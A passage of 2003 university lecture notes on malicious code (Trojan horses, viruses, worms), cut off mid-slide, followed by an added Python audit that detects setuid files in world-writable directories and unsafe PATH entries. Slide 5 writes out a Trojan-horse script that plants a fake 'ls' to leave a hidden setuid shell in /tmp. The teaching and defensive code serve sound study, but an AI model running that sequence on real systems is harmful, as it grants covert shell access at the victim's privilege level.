Lecture 11: Malicious Code, Vulnerability Analysis, Intrusion Detection
INFSCI 2935: Introduction to Computer Security
November 13, 2003
Courtesy of Professors Chris Clifton & Matt Bishop

Outline (slide titles of the full deck)
  What is Malicious Code?
  Types of Malicious Code
  Trojan Horse
  Propagation
  Virus
  Virus Types
  Virus Types/Properties
  Slide 9
  Worms
  Other forms of malicious logic
  What do we Do?
  We can't detect it: Now what?
  Detection
  Detection
  Defense
  Slide 16
  Slide 17
  Slide 18
  Vulnerability Analysis
  Techniques for Detecting Vulnerabilities
  System Verification
  Penetration Testing
  Types/layers of Penetration Testing
  Red Team Approach
  Flaw Hypothesis Methodology
  Problems with Penetration Testing
  Vulnerability Classification
  Example flaw: xterm log
  Example: Finger Daemon (exploited by Morris worm)
  Vulnerability Classification: Generalize
  RISOS: Research Into Secure Operating Systems (Seven Classes)
  Protection Analysis Model Classes
  PA flaw classes
  NRL Taxonomy
  NRL Taxonomy (Genesis)
  NRL Taxonomy: Time
  NRL Taxonomy: Location
  Aslam's Model
  Common Vulnerabilities and Exposures (cve.mitre.org)
  Buffer Overflow
  Slide 41
  Slide 42
  Intrusion Detection/Response
  Intrusion Detection
  IDS Types: Anomaly Detection
  Anomaly Detection: How do we determine normal?
  IDS Types: Misuse Modeling
  Specification Modeling
  IDS Systems
  IDS Architecture
  Where is the Agent?
  IDS Problem
  Intrusion Response
  Containment
  Eradication
  Follow-Up

Slide 2: What is Malicious Code?
- Set of instructions that causes a security policy to be violated
  - Is an unintentional mistake that violates policy malicious code? (Tricked into doing that?)
  - What about "unwanted" code that doesn't cause a security breach?
- Generally relies on "legal" operations
  - Authorized user could perform the operations without violating policy
  - Malicious code "mimics" an authorized user

Slide 3: Types of Malicious Code
- Trojan horse: tricks the user into executing malicious code
- Virus: replicates and inserts itself into a fixed set of files
- Worm: copies itself from computer to computer

Slide 4: Trojan Horse
- Program with an overt (expected) and a covert (unexpected) effect
  - Appears normal/expected
  - Covert effect violates the security policy
- User tricked into executing the Trojan horse
  - Expects (and sees) the overt behavior
  - Covert effect performed with the user's authorization
- Trojan horse may replicate
  - Creates a copy on execution
  - Spreads to other users/systems

Slide 5: Propagation
Perpetrator:
    cat >/homes/victim/ls <<eof
    cp /bin/sh /tmp/.xxsh
    chmod u+s,o+x /tmp/.xxsh
    rm ./ls
    ls $*
    eof
Victim:
    ls
- It is a violation to trick someone into creating a shell that is setuid to themselves
- How to replicate this?

Slide 6: Virus
- Self-replicating code
  - A freely propagating Trojan horse (some disagree that it is a Trojan horse)
  - Inserts itself into another file
  - Alters normal code with an "infected" version
- Operates when the infected code is executed:
    If spread condition then
      For target files
        if not infected then alter to include virus
    Perform malicious action
    Execute normal program

Slide 7: Virus Types
- Boot sector infectors (the Brain virus)
  - Problem: how to ensure the virus "carrier" is executed?
  - Solution: place it in the boot sector of the disk
  - Runs on any boot
  - Propagates by altering boot disk creation
  - Less common now that few systems boot off floppies
- Executable infector (the Jerusalem virus, Friday 13th, not 1987)
  - Malicious code placed at the beginning of a legitimate program (.COM, .EXE files)
  - Runs when the application is run
  - Application then runs normally
- Multipartite virus: boot sector + executable infector

Slide 8: Virus Types/Properties
- Terminate and Stay Resident
  - Stays active in memory after the application completes
  - Allows infection of previously unknown files
  - Traps calls that execute a program
  - Can be boot sector infectors or executable infectors (Brain and Jerusalem)
- Stealth (an executable infector)
  - Conceals the infection
  - Traps reads to provide the disinfected file
  - Lets execute calls run the infected file
- Encrypted virus
  - Prevents a "signature" from detecting the virus
  - [Deciphering routine, Enciphered virus code, Deciphering key]
- Polymorphism
  - Changes the virus code to something equivalent each time it propagates

Slide 9: Virus Types/Properties
- Macro virus
  - Composed of a sequence of instructions that is interpreted rather than executed directly
  - Infected "executable" isn't machine code
  - Relies on something "executed" inside application data
  - Example: the Melissa virus infected Word 97/98 documents
- Otherwise similar properties to other viruses
  - Architecture-independent
  - Application-dependent

Slide 10: Worms
- Replicates from one computer to another
  - Self-replicating: no user action required
  - Virus: user performs a "normal" action
  - Trojan horse: user is tricked into performing an action
- Communicates/spreads using standard protocols

Slide 11: Other forms of malicious logic
- We've discussed how they propagate
  - But what do they do?
- Rabbits/Bacteria
  - Exhaust system resources of some class
  - Denial
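The Propagation slide depends on two conditions on the victim's side: a PATH that lets a file named ls in the current (or any world-writable) directory shadow /bin/ls, and the ability to leave a setuid copy of the shell in a world-writable directory such as /tmp. The audit below is an added example written for this page, not code from the lecture or its authors: scan_setuid walks the given directories and reports setuid/setgid regular files, noting whether the parent directory is world-writable and whether the file has a hidden name; audit_path flags relative, empty and world-writable PATH entries. build_demo_tree constructs a stand-in for /tmp containing an empty placeholder file named .xxsh with the mode the slide's chmod would produce (the names and the placeholder are assumptions for the demonstration, and no shell is copied).

```python
"""Audit for the preconditions of the Trojan-horse `ls` trick on the Propagation slide.

Added example for this page (not part of the original lecture): it looks for
(1) setuid/setgid executables in the scanned directories, noting those in
world-writable directories such as /tmp, and (2) PATH entries that let a file
in the current or a world-writable directory shadow a system command like /bin/ls.
"""
import os
import shutil
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    kind: str    # "setuid", "setgid", "path_relative" or "path_writable"
    path: str
    detail: str


def is_world_writable_dir(path: str) -> bool:
    """True if path is a directory with the other-write bit set (e.g. /tmp)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def scan_setuid(roots):
    """Walk each root and report regular files with the setuid or setgid bit set.

    The detail records whether the parent directory is world-writable, which is
    where the slide's /tmp/.xxsh copy of the shell would appear, and whether the
    name is hidden (starts with a dot)."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):   # os.walk does not follow symlinks
            parent_ww = is_world_writable_dir(dirpath)
            for name in files:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)                   # lstat: inspect the link itself
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue
                for bit, kind in ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid")):
                    if st.st_mode & bit:
                        where = "world-writable" if parent_ww else "private"
                        hidden = ", hidden name" if name.startswith(".") else ""
                        findings.append(Finding(
                            kind, p, f"owner uid {st.st_uid}, parent dir {where}{hidden}"))
    return findings


def audit_path(path_env: str):
    """Report PATH entries that let an attacker-controlled file shadow a system command."""
    findings = []
    for i, entry in enumerate(path_env.split(os.pathsep)):
        shown = entry or "(empty)"
        if entry in ("", ".") or not os.path.isabs(entry):
            findings.append(Finding("path_relative", shown,
                f"entry {i} is relative: a file named ls in the current directory runs instead of /bin/ls"))
        elif is_world_writable_dir(entry):
            findings.append(Finding("path_writable", shown,
                f"entry {i} is world-writable: anyone can drop a program there"))
    return findings


def build_demo_tree() -> str:
    """Constructed stand-in for /tmp after the slide's fake ls has run: a world-writable
    directory holding a hidden setuid file. The file is a text placeholder, not a shell."""
    d = tempfile.mkdtemp(prefix="malcode-demo-")
    os.chmod(d, 0o1777)                  # sticky + world-writable, like /tmp
    p = os.path.join(d, ".xxsh")
    with open(p, "w") as f:
        f.write("placeholder, not a shell\n")
    os.chmod(p, 0o4755)                  # u+s plus o+x, the mode the slide's chmod yields
    return d


def remove_demo_tree(d: str) -> None:
    shutil.rmtree(d, ignore_errors=True)


if __name__ == "__main__":
    demo = build_demo_tree()
    try:
        for f in scan_setuid([demo]):
            print(f"{f.kind:14} {f.path}  ({f.detail})")
    finally:
        remove_demo_tree(demo)
    # Constructed PATH showing the victim configuration the slide relies on.
    for f in audit_path(".:/usr/local/bin:/usr/bin:/bin"):
        print(f"{f.kind:14} {f.path}  ({f.detail})")
```

In production use, point scan_setuid at the world-writable directories on the host (/tmp, /var/tmp and any shared scratch areas) and compare the result against a known-good baseline of setuid files; a setuid file with a hidden name in such a directory is the artifact the slide's Trojan horse leaves behind, and removing "." and empty entries from PATH removes the precondition it needs in the first place.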